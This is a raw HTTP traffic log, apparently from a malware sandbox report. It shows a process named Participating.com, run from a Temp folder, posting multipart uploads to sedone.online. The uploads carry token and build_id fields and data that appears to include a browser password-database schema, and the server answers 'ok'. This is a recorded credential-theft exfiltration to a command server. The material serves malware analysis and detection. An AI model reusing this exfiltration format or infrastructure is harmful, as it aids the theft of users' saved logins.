                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:05 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                13192.168.2.849742116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:06 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GLFCJE3OP8YUAIWLN7GV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 55081
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:06 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------GLFCJE3OP8YUAIWLN7GVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:06 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:06 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:06 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:07 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                14192.168.2.849743116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 56 33 57 4c 4e 47 44 32 36 46 33 45 55 33 57 34 4f 38 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------V3WLNGD26F3EU3W4O8GVCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
